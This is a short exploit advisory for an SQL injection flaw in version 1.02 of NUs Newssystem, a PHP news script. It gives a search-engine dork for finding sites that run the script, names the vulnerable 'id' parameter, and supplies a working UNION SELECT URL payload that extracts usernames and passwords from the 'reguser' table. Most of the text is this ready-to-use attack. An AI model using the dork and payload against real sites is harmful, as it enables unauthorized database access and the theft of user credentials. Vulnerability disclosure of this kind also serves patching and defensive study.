NUs Newssystem version 1.02 suffers from a remote SQL injection vulnerability.
148116ce4e0a89b3feec62e659dc4ccda6cb5f0f9b5bfe169f2a0e30e6210116
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
[+] Autor: n3w7u
[+] Page: http://www.internet-works.de/home.html
[+] Source: http://www.internet-works.de/download.php?page=home.html
[+] Vulnerabilities [ SQL Injection ]
[+] Language: [ PHP ]
[+] Version: 1.02
[+] Dork : inurl:"?pageNum_RSnews"&view
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
Nus.php?pageNum_RSnews=0&id=
[+] Exploitable
http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--